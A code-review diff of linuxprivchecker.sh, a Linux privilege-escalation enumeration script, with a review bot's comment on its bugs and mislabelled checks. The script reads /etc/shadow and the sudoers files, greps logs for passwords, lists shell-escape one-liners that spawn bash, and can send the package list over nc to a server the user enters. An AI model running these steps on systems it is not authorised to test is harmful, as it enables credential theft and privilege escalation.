| skipped 1 lines |
2 | 2 | | |
3 | 3 | | ############################################################################################################### |
4 | 4 | | ## [Title]: linuxprivchecker.sh -- a Linux Privilege Escalation Check Script |
5 | | - | ## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift |
6 | | - | ## [Contributors]: Mike Merrill (linted) -- https://github.com/linted |
7 | | - | ## James Hogan (5aru) -- https://github.com/5aru |
| 5 | + | ## [Original Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift |
| 6 | + | ## Forked from linuxprivchecker.py -- https://github.com/sleventyeleven/linuxprivchecker |
| 7 | + | ## [Contributors]: |
| 8 | + | ## Mike Merrill (linted) -- https://github.com/linted |
| 9 | + | ## James Hogan (5aru) -- https://github.com/5aru |
| 10 | + | ## Ali Kaba (alibkaba) -- https://github.com/alibkaba |
8 | 11 | | ##------------------------------------------------------------------------------------------------------------- |
9 | 12 | | ## [Details]: |
10 | | - | ## Similar functions to Mike Czumak's linuxprivchecker.py Linux Privilege Escalation Check Script. |
11 | 13 | | ## This script is intended to be executed locally on a Linux box to enumerate basic system info and |
12 | 14 | | ## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text |
13 | 15 | | ## passwords and applicable exploits. |
| skipped 17 lines |
31 | 33 | | ## USE OR OTHER DEALINGS IN THE SOFTWARE. |
32 | 34 | | ############################################################################################################### |
33 | 35 | | |
34 | | - | ### Useful functions |
35 | | - | |
| 36 | + | # command paths |
36 | 37 | | PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games" |
37 | 38 | | |
38 | | - | TITLE_LINE=$(printf "%*s\n" "80" | tr ' ' "=") |
39 | | - | SECTION_LINE=$(printf "%*s\n" "80" | tr ' ' "-") |
| 39 | + | # fonts formatting |
| 40 | + | RESET='\e[0m'; # No Color |
| 41 | + | RED='\e[31m'; |
| 42 | + | LRED='\e[91m'; |
| 43 | + | GREEN='\e[32m'; |
| 44 | + | LGREEN='\e[92m'; |
| 45 | + | LYELLOW='\e[93m'; |
| 46 | + | LCYAN='\e[96m'; |
| 47 | + | BLINK='\e[5m'; |
| 48 | + | BOLD='\e[1m'; |
40 | 49 | | |
41 | | - | function formatCommand(){ |
42 | | - | eval $1 | sed 's|^| |' |
| 50 | + | # line formatting |
| 51 | + | titleLINE=$(printf "${LGREEN}%*s\n" "70" | tr ' ' "="); |
| 52 | + | sectionLINE=$(printf "${LGREEN}%*s\n" "40" | tr ' ' "-"); |
| 53 | + | |
| 54 | + | # title |
| 55 | + | scriptTITLE(){ |
| 56 | + | echo ${titleLINE}; |
| 57 | + | echo "LINUX PRIVILEGE ESCALATION CHECKER" |
| 58 | + | echo "Go to https://github.com/linted/linuxprivchecker for more info..." |
| 59 | + | echo -e ${titleLINE}${RESET}; |
43 | 60 | | } |
44 | 61 | | |
45 | | - | echo ${TITLE_LINE} |
46 | | - | echo "LINUX_PRIVILEGE ESCALATION CHECKER" |
47 | | - | echo ${TITLE_LINE} |
| 62 | + | systemAREAtitle(){ |
| 63 | + | echo ${sectionLINE}; |
| 64 | + | echo "[*] $systemAREA..."; |
| 65 | + | echo -e ${sectionLINE}${RESET}; |
| 66 | + | printf "\n"; |
| 67 | + | sleep .5s; |
| 68 | + | } |
48 | 69 | | |
49 | | - | echo -e "\n[*] GETTING BASIC SYSTEM INFO...\n" |
| 70 | + | cmdRESPONSE(){ |
| 71 | + | # run and format cmd |
| 72 | + | cmdRESULT=$(eval $1 2>/dev/null | sed 's|^| |'; echo "${PIPESTATUS[0]}"); |
50 | 73 | | |
51 | | - | echo "[+] Operating System" |
52 | | - | formatCommand "cat /etc/issue" |
| 74 | + | # check cmd status |
| 75 | + | if [ ${cmdRESULT:(-1)} -eq 0 ]; then |
| 76 | + | echo -e "${LGREEN}[+] $systemNAME"; |
| 77 | + | printf "${GREEN}${cmdRESULT%?}\n${RESET}"; |
| 78 | + | else |
| 79 | + | echo -e "${LRED}[!] $systemNAME"; |
| 80 | + | printf "${LYELLOW}${cmdRESULT%?}\n${RESET}"; |
| 81 | + | fi |
| 82 | + | sleep .5s; |
| 83 | + | } |
53 | 84 | | |
54 | | - | echo -e "\n[+] Kernel" |
55 | | - | formatCommand "cat /proc/version" |
| 85 | + | operatingSYSTEM(){ |
| 86 | + | systemAREA="OPERATING SYSTEM"; |
| 87 | + | systemAREAtitle; |
56 | 88 | | |
57 | | - | echo -e "\n[+] Hostname/FQDN" |
58 | | - | formatCommand "hostname -f" |
59 | | - | |
60 | | - | echo -ne "\n${SECTION_LINE}\n" |
61 | | - | echo -e "[*] GETTING NETWORKING INFO...\n" |
62 | | - | |
63 | | - | echo "[+] Route" |
64 | | - | |
65 | | - | if [ -x "$(command -v route)" ]; then |
66 | | - | formatCommand "route -n" |
67 | | - | else |
68 | | - | formatCommand "ip route" |
69 | | - | fi |
70 | | - | |
71 | | - | echo -e "\n[+] Interfaces" |
72 | | - | |
73 | | - | if [ -x "$(command -v ifconfig)" ]; then |
74 | | - | formatCommand "ifconfig -a" |
75 | | - | else |
76 | | - | formatCommand "ip addr show" |
77 | | - | fi |
| 89 | + | systemNAME="Distribution"; |
| 90 | + | cmdRESPONSE "cat /etc/*-release"; |
78 | 91 | | |
79 | | - | echo -e "\n[+] Network Connections" |
| 92 | + | systemNAME="Kernel"; |
| 93 | + | cmdRESPONSE "if [ -f /proc/version ]; then cat /proc/version; else uname -a; fi"; |
80 | 94 | | |
81 | | - | if [ -x "$(command -v netstat)" ]; then |
82 | | - | formatCommand "netstat -tupan | grep -v TIME_WAIT" |
83 | | - | else |
84 | | - | formatCommand "ss -tupan | grep -v CLOSE_WAIT" |
85 | | - | fi |
| 95 | + | systemNAME="Hostname"; |
| 96 | + | cmdRESPONSE "hostname -f"; |
| 97 | + | } |
86 | 98 | | |
87 | | - | echo -ne "\n${SECTION_LINE}\n" |
88 | | - | echo -e "[*] GETTING FILESYSTEM INFO...\n" |
| 99 | + | netWORK(){ |
| 100 | + | systemAREA="NETWORK"; |
| 101 | + | systemAREAtitle; |
89 | 102 | | |
90 | | - | echo -e "\n[+] Mount Results" |
91 | | - | formatCommand "mount" |
| 103 | + | systemNAME="Network Interfaces"; |
| 104 | + | cmdRESPONSE "ifconfig || ip a"; |
92 | 105 | | |
93 | | - | echo -e "\n[+] fstab Entries" |
94 | | - | formatCommand "cat /etc/fstab 2>/dev/null" |
| 106 | + | systemNAME="DNS Resolver"; |
| 107 | + | cmdRESPONSE "cat /etc/resolv.conf"; |
95 | 108 | | |
96 | | - | echo -e "\n[+] Scheduled cron jobs" |
97 | | - | formatCommand "ls -al /etc/cron* 2>/dev/null" |
| 109 | + | systemNAME="Route"; |
| 110 | + | cmdRESPONSE "route -n || ip route"; |
| 111 | + | } |
98 | 112 | | |
99 | | - | echo -e "\n[+] Writable cron directories" |
100 | | - | formatCommand "ls -aRl /etc/cron* 2>/dev/null | awk '$1 ~ /w.$' 2>/dev/null" |
| 113 | + | userENVIRONMENT(){ |
| 114 | + | systemAREA="USERS & ENVIRONMENT"; |
| 115 | + | systemAREAtitle; |
101 | 116 | | |
102 | | - | echo -ne "\n${SECTION_LINE}\n" |
103 | | - | echo -e "[*] ENUMERATING USER AND ENVIRONMENTAL INFO...\n" |
104 | | - | echo -e "\n[+] Current User" |
105 | | - | formatCommand "whoami" |
| 117 | + | systemNAME="Current User"; |
| 118 | + | cmdRESPONSE "whoami"; |
106 | 119 | | |
107 | | - | echo -e "\n[+] Current User ID" |
108 | | - | formatCommand "id" |
| 120 | + | systemNAME="Current User ID"; |
| 121 | + | cmdRESPONSE "id"; |
109 | 122 | | |
110 | | - | echo -e "\n[+] All users" |
111 | | - | formatCommand "cat /etc/passwd" |
| 123 | + | systemNAME="Who's Logged Right Now"; |
| 124 | + | cmdRESPONSE "w"; |
112 | 125 | | |
113 | | - | echo -e "\n[+] Super Users Found" |
114 | | - | formatCommand "grep -v -E '^#' /etc/passwd | awk -F: '\$3 == 0{print \$1}'" |
| 126 | + | systemNAME="Who's Logged Last"; |
| 127 | + | cmdRESPONSE "last"; |
115 | 128 | | |
116 | | - | echo -e "\n[+] Root and current user history (depends on privs)" |
117 | | - | formatCommand "ls -al ~/.*_history; ls -la /root/.*_history 2>/dev/null" |
| 129 | + | systemNAME="All Users"; |
| 130 | + | cmdRESPONSE "cat /etc/passwd"; |
118 | 131 | | |
119 | | - | echo -e "\n[+] Environment Variables" |
120 | | - | formatCommand "env 2>/dev/null | grep -v 'LS_COLORS'" |
| 132 | + | systemNAME="All Groups"; |
| 133 | + | cmdRESPONSE "cat /etc/group"; |
121 | 134 | | |
122 | | - | echo -e "\n[+] Sudoers (Privileged) [/etc/sudoers]" |
123 | | - | formatCommand "cat /etc/sudoers 2>/dev/null | grep -v '#' 2>/dev/null" |
| 135 | + | systemNAME="Shadow File"; |
| 136 | + | cmdRESPONSE "cat /etc/shadow"; |
124 | 137 | | |
125 | | - | echo -e "\n[+] Sudoers Files (Privileged) [/etc/sudoers.d/*]" |
126 | | - | formatCommand "cat /etc/sudoers.d/* 2>/dev/null | grep -v '#' 2>/dev/null" |
| 138 | + | systemNAME="Super Users"; |
| 139 | + | cmdRESPONSE "grep -v -E '^#' /etc/passwd | awk -F: '(/$3 == 0) { print /$1 }'"; |
127 | 140 | | |
128 | | - | echo -e "\n[+] Logged in User Activity" |
129 | | - | formatCommand "w 2>/dev/null" |
| 141 | + | systemNAME="Sudo Users"; |
| 142 | + | cmdRESPONSE "cat /etc/sudoers | grep -v '#'"; |
130 | 143 | | |
131 | | - | echo -ne "\n${SECTION_LINE}\n" |
132 | | - | echo -e "[*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...\n" |
| 144 | + | systemNAME="Sudoers (Privileged) [/etc/sudoers]"; |
| 145 | + | cmdRESPONSE "cat /etc/sudoers | grep -v '#'"; |
133 | 146 | | |
134 | | - | echo -e "\n[+] World Writable Directories for User/Group 'root'" |
135 | | - | formatCommand "find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep root" |
| 147 | + | systemNAME="Sudoers Files (Privileged) [/etc/sudoers.d/*]"; |
| 148 | + | cmdRESPONSE "cat /etc/sudoers.d/* | grep -v '#'"; |
136 | 149 | | |
137 | | - | echo -e "\n[+] World Writable Directories for User other than 'root'" |
138 | | - | formatCommand "find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null" |
| 150 | + | systemNAME="Root and Current User History (depends on privs)"; |
| 151 | + | cmdRESPONSE "ls -al ~/.*_history 2>/dev/null; ls -la /root/.*_history"; |
139 | 152 | | |
140 | | - | echo -e "\n[+] World Writable Files" |
141 | | - | formatCommand "find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0 002 \) -exec ls -l '{}' ';' 2>/dev/null" |
| 153 | + | systemNAME="Environment Variables"; |
| 154 | + | cmdRESPONSE "env | grep -v "LS_COLORS""; |
142 | 155 | | |
143 | | - | echo -e "\n[+] SUID/GUID Files and Directories" |
144 | | - | formatCommand "find / \( -perm -2000 -o -perm -4000 \) -exec ls -ld {} \; 2>/dev/null" |
| 156 | + | systemNAME="Printer"; |
| 157 | + | cmdRESPONSE "lpstat -a"; |
| 158 | + | } |
145 | 159 | | |
146 | | - | echo -e "\n[+] Checking if root's home folder is accessible" |
147 | | - | formatCommand "ls -ahlR /root 2>/dev/null" |
| 160 | + | filePERMISSIONS(){ |
| 161 | + | systemAREA="FILE SYSTEMS & PERMISSIONS"; |
| 162 | + | systemAREAtitle; |
148 | 163 | | |
149 | | - | echo -e "\n[+] Logs containing keyword 'password'" |
150 | | - | formatCommand "find /var/log -name '*.log' 2>/dev/null | xargs -l10 egrep 'pwd|password' 2>/dev/null" |
| 164 | + | systemNAME="Mounts"; |
| 165 | + | cmdRESPONSE "mount"; |
151 | 166 | | |
152 | | - | echo -e "\n[+] Config files containing keyword 'password'" |
153 | | - | formatCommand "find /etc -name '*.c*' 2>/dev/null | xargs -l10 egrep 'pwd|password' 2>/dev/null" |
| 167 | + | systemNAME="fstab Entries"; |
| 168 | + | cmdRESPONSE "cat /etc/fstab"; |
154 | 169 | | |
155 | | - | echo -e "\n[+] Shadow Files (Privileged)" |
156 | | - | formatCommand "cat /etc/shadow 2>/dev/null" |
| 170 | + | systemNAME="Scheduled Cron Jobs"; |
| 171 | + | cmdRESPONSE "ls -al /etc/cron*"; |
157 | 172 | | |
158 | | - | echo -ne "\n${SECTION_LINE}\n" |
159 | | - | echo -e "[*] ENUMERATING PROCESSES AND APPLICATIONS...\n" |
| 173 | + | systemNAME="Writable Cron Directories"; |
| 174 | + | cmdRESPONSE "ls -aRl /etc/cron* | awk '/$1 ~ /w.$'"; |
160 | 175 | | |
161 | | - | echo -e "[+] Installed Packages" |
162 | | - | if [ -x "$(command -v dpkg)" ]; then |
163 | | - | PKGMNGR=1 |
164 | | - | formatCommand "dpkg -l | awk '{\$1=\$4=\"\"; print \$0}'" |
165 | | - | elif [ -x "$(command -v dnf)" ]; then |
166 | | - | PKGMNGR=2 |
167 | | - | formatCommand "dnf -qa | sort -u" |
168 | | - | elif [ -x "$(command -v rpm)" ]; then |
169 | | - | PKGMNGR=3 |
170 | | - | formatCommand "rpm -qa | sort -u" |
171 | | - | fi |
| 176 | + | systemNAME="Root Home Folder Accessibility"; |
| 177 | + | cmdRESPONSE "ls -lt /root/"; |
172 | 178 | | |
173 | | - | echo -e "\n[+] Current Processes" |
174 | | - | formatCommand "ps aux | awk '{print \$1,\$2,\$9,\$10,\$11}'" |
| 179 | + | systemNAME="World Writeables Directories for User/Group 'root'"; |
| 180 | + | cmdRESPONSE "find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -o+w \) -exec ls -ld '{}' ';' | grep root"; |
175 | 181 | | |
176 | | - | echo -e "\n[+] Sudo Version" |
177 | | - | formatCommand "sudo -V | grep version 2>/dev/null" |
| 182 | + | systemNAME="World Writeables Directories for non-root Users"; |
| 183 | + | cmdRESPONSE "find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' | grep -v root "; |
178 | 184 | | |
179 | | - | echo -e "\n[+] Apache Version and Modules" |
180 | | - | formatCommand "apache2 -v 2>/dev/null; apache2ctl -M 2>/dev/null; httpd -v 2>/dev/null; apachectl -l 2>/dev/null" |
| 185 | + | systemNAME="World Writeables Files"; |
| 186 | + | cmdRESPONSE "find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0 002 \) -exec ls -l '{}' ';'"; |
181 | 187 | | |
182 | | - | echo -e "\n[+] Apache Config File" |
183 | | - | formatCommand "cat /etc/apache2/apache2.conf 2>/dev/null" |
| 188 | + | systemNAME="SUID/GUID Files and Directories"; |
| 189 | + | cmdRESPONSE "ls -ahlR /root"; |
184 | 190 | | |
185 | | - | echo -ne "\n${SECTION_LINE}\n" |
186 | | - | echo -e "[*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER...\n" |
| 191 | + | systemNAME="Configuration Files Containing Keyword 'password'"; |
| 192 | + | cmdRESPONSE "find /var/log -name '*.log' | xargs -l10 egrep 'pwd|password' 2>/dev/null"; |
| 193 | + | } |
187 | 194 | | |
188 | | - | EXTDGREP="($(ps -u 0 | tail -n+2 | rev | cut -d " " -f 1 | rev | cut -d "/" -f1 | sort | uniq | xargs | tr " " "|"))" |
| 195 | + | applicationSERVICES(){ |
| 196 | + | systemAREA="APPLICATIONS & SERVICES"; |
| 197 | + | systemAREAtitle; |
189 | 198 | | |
190 | | - | if [ $PKGMNGR -eq 1 ]; then |
191 | | - | formatCommand "dpkg -l | grep -iE '${EXTDGREP}'" |
192 | | - | elif [ $PKGMNGR -eq 2 ]; then |
193 | | - | formatCommand "dnf -qa | grep -iE '${EXTDGREP}'" |
194 | | - | elif [ $PKGMNGR -eq 3 ]; then |
195 | | - | formatCommand "rpm -qa | grep -iE '${EXTDGREP}'" |
196 | | - | fi |
| 199 | + | systemNAME="Installed Packages"; |
| 200 | + | cmdRESPONSE "if [ -x "$(command -v dpkg)" ]; then dpkg -l | awk '{\$1=\$4=\"\"; print \$0}'; elif [ -x "$(command -v dnf)" ]; then dnf -qa | sort -u; elif [ -x "$(command -v rpm)" ]; then rpm -qa | sort -u; fi"; |
197 | 201 | | |
198 | | - | echo -ne "\n${SECTION_LINE}\n" |
199 | | - | echo -e "[*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING..." |
| 202 | + | systemNAME="Current Running Services"; |
| 203 | + | cmdRESPONSE "ps aux | awk '{print \$1,\$2,\$9,\$10,\$11}'"; |
200 | 204 | | |
201 | | - | echo -e "\n[+] Installed Tools" |
202 | | - | formatCommand "which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null" |
| 205 | + | systemNAME="Sudo version"; |
| 206 | + | cmdRESPONSE "sudo -V | grep version"; |
203 | 207 | | |
204 | | - | echo -e "\n[+] Related Shell Escape Sequences" |
205 | | - | if [ -x "$(command -v vi)" ]; then |
206 | | - | formatCommand "echo -ne \"vi-->\t:!bash\n\"" |
207 | | - | formatCommand "echo -ne \"vi-->\t:set shell=/bin/bash:shell\n\"" |
208 | | - | fi |
| 208 | + | systemNAME="Apache Version and Modules"; |
| 209 | + | cmdRESPONSE "apache2 -v 2>/dev/null; apache2ctl -M 2>/dev/null; httpd -v 2>/dev/null; apachectl -l"; |
209 | 210 | | |
210 | | - | if [ -x "$(command -v vim)" ]; then |
211 | | - | echo -ne "vim-->\t:!bash\n" | sed 's|^| |' |
212 | | - | echo -ne "vim-->\t:set shell=/bin/bash:shell\n" | sed 's|^| |' |
213 | | - | fi |
| 211 | + | systemNAME="Apache Config File"; |
| 212 | + | cmdRESPONSE "cat /etc/apache2/apache2.conf"; |
214 | 213 | | |
215 | | - | if [ -x "$(command -v awk)" ]; then |
216 | | - | echo -ne "awk-->\tawk 'BEGIN {system(\"/bin/bash\")}'\n" | sed 's|^| |' |
217 | | - | fi |
| 214 | + | systemNAME="Processes and Packages Running as Root or other Superuser"; |
| 215 | + | EXTDGREP="($(ps -u 0 | tail -n+2 | rev | cut -d " " -f 1 | rev | cut -d "/" -f1 | sort | uniq | xargs | tr " " "|"))"; |
| 216 | + | cmdRESPONSE "if [ -x "$(command -v dpkg)" ]; then dpkg -l | grep -iE '${EXTDGREP}'; elif [ -x "$(command -v dnf)" ]; then dnf -qa | grep -iE '${EXTDGREP}'; elif [ -x "$(command -v rpm)" ]; then rpm -qa | grep -iE '${EXTDGREP}'; fi"; |
218 | 217 | | |
219 | | - | if [ -x "$(command -v perl)" ]; then |
220 | | - | echo -ne "perl-->\tperl -e 'exec \"/bin/bash\";'\n" | sed 's|^| |' |
221 | | - | fi |
| 218 | + | systemNAME="Installed Tools"; |
| 219 | + | cmdRESPONSE "which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp"; |
222 | 220 | | |
223 | | - | if [ -x "$(command -v python)" ]; then |
224 | | - | echo -ne "python-->\tpython -c '__import__(\"os\").system(\"/bin/bash\")'\n" | sed 's|^| |' |
225 | | - | fi |
| 221 | + | systemNAME="Related Shell Escape Sequences"; |
| 222 | + | cmdRESPONSE "if [ -x "$(command -v vi)" ]; then echo -ne \"vi-->\t:!bash\n\"; echo -ne \"vi-->\t:set shell=/bin/bash:shell\n\"; fi"; |
| 223 | + | cmdRESPONSE "if [ -x "$(command -v vim)" ]; then echo -ne \"vim-->\t:!bash\n\" | sed 's|^| |'; echo -ne "vim-->\t:set shell=/bin/bash:shell\n" | sed 's|^| |'; fi"; |
| 224 | + | cmdRESPONSE "if [ -x "$(command -v awk)" ]; then echo -ne \"awk-->\tawk 'BEGIN {system(\"/bin/bash\")}'\n\" | sed 's|^| |'; fi"; |
| 225 | + | cmdRESPONSE "if [ -x "$(command -v perl)" ]; then echo -ne \"perl-->\tperl -e 'exec \"/bin/bash\";'\n\" | sed 's|^| |'; fi"; |
| 226 | + | cmdRESPONSE "if [ -x "$(command -v python)" ]; then echo -ne \"python-->\tpython -c '__import__(\"os\").system(\"/bin/bash\")'\n\" | sed 's|^| |'; fi"; |
| 227 | + | cmdRESPONSE "if [ -x "$(command -v find)" ]; then echo -ne \"find->\tfind / -exec /usr/bin/awk 'BEGIN {system(\"/bin/bash\")}' \\;\n\" | sed 's|^| |'; fi"; |
| 228 | + | cmdRESPONSE "if [ -x "$(command -v nmap)" ]; then echo -ne \"nmap-->\t--interactive\n\" | sed 's|^| |'; fi"; |
| 229 | + | } |
226 | 230 | | |
227 | | - | if [ -x "$(command -v find)" ]; then |
228 | | - | echo -ne "find->\tfind / -exec /usr/bin/awk 'BEGIN {system(\"/bin/bash\")}' \\;\n" | sed 's|^| |' |
229 | | - | fi |
| 231 | + | searchEXPLOITS(){ |
| 232 | + | systemAREA="Search for Exploits"; |
| 233 | + | systemAREAtitle; |
230 | 234 | | |
231 | | - | if [ -x "$(command -v nmap)" ]; then |
232 | | - | echo -ne "nmap-->\t--interactive\n" | sed 's|^| |' |
233 | | - | fi |
| 235 | + | echo -e "[*] FINDING RELEVANT PRIVILEGE ESCALATION EXPLOITS..." |
| 236 | + | read -p "[?] Would you like to search for possible exploits? [y/N] " connectToServer |
234 | 237 | | |
235 | | - | echo -ne "\n${SECTION_LINE}\n" |
236 | | - | echo -e "[*] FINDING RELEVANT PRIVILEGE ESCALATION EXPLOITS..." |
237 | | - | read -p "[?] Would you like to search for possible exploits? [y/N] " connectToServer |
| 238 | + | if [[ $connectToServer = y* ]] |
| 239 | + | then |
| 240 | + | read -p "[?] What is the address of the server? " server |
| 241 | + | read -p "[?] What port is the server using? " port |
| 242 | + | echo -ne "\n\n" |
| 243 | + | echo -e "[ ] Searching on $server:$port" |
| 244 | + | printf "%*s\n" "80" | tr " " "*" |
| 245 | + | dpkg -l | tail -n +6 | awk '{print $2, $3} END {print ""}' | nc $server $port |
| 246 | + | printf "%*s\n" "80" | tr " " "*" |
| 247 | + | fi |
| 248 | + | } |
238 | 249 | | |
239 | | - | if [[ $connectToServer = y* ]] |
240 | | - | then |
241 | | - | read -p "[?] What is the address of the server? " server |
242 | | - | read -p "[?] What port is the server using? " port |
243 | | - | echo -ne "\n\n" |
244 | | - | echo -e "[ ] Searching on $server:$port" |
245 | | - | printf "%*s\n" "80" | tr " " "*" |
246 | | - | dpkg -l | tail -n +6 | awk '{print $2, $3} END {print ""}' | nc $server $port |
247 | | - | printf "%*s\n" "80" | tr " " "*" |
248 | | - | fi |
| 250 | + | start(){ |
| 251 | + | scriptTITLE; |
| 252 | + | operatingSYSTEM; |
| 253 | + | netWORK; |
| 254 | + | userENVIRONMENT; |
| 255 | + | filePERMISSIONS; |
| 256 | + | applicationSERVICES; |
| 257 | + | searchEXPLOITS; |
| 258 | + | echo ${titleLINE}; |
| 259 | + | echo "FINISHED" |
| 260 | + | echo -e ${titleLINE}${RESET}; |
| 261 | + | echo -e $RESET; |
| 262 | + | } |
249 | 263 | | |
250 | | - | echo -ne "\n\n${TITLE_LINE}" |
251 | | - | echo -ne "\nFINISHED" |
252 | | - | echo -ne "\n${TITLE_LINE}\n" |
| 264 | + | start; |
253 | 265 | | |
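Review bot: In `cmdRESPONSE` (new lines 72-80) the captured command output is passed to `printf` as the format string, so any `%` or backslash in the output is interpreted instead of printed; sudoers group entries beginning with `%` would come out altered in the report. The status test `${cmdRESULT:(-1)}` reads only the last character, so a status such as 127 leaves `12` in the displayed text and any status ending in 0 is shown as success. Capturing the status separately and printing the output through `%s` fixes both, as sketched below. Separately, the check labelled "SUID/GUID Files and Directories" (new line 189) now runs `ls -ahlR /root` and the one labelled "Configuration Files Containing Keyword 'password'" (new line 192) searches `/var/log`, so the report claims coverage that the removed `find / \( -perm -2000 -o -perm -4000 \)` and `/etc` searches used to provide. The "Super Users" awk program (new line 139) uses `/$3` where the removed line had `\$3`, so the calling shell expands `$3` before awk sees it, and the resulting error is hidden by `2>/dev/null`.

```shell
cmdRESPONSE(){
    local cmdOUTPUT cmdSTATUS;
    # exit with eval's status so it never mixes into the captured text
    cmdOUTPUT=$(eval "$1" 2>/dev/null | sed 's|^| |'; exit "${PIPESTATUS[0]}");
    cmdSTATUS=$?;

    if [ "$cmdSTATUS" -eq 0 ]; then
        # … unchanged: green "[+] $systemNAME" header …
        # command output is data, never the format string
        printf "${GREEN}%s\n${RESET}" "$cmdOUTPUT";
    else
        # … unchanged: red "[!] $systemNAME" header …
        printf "${LYELLOW}%s\n${RESET}" "$cmdOUTPUT";
    fi
    # … unchanged: sleep …
```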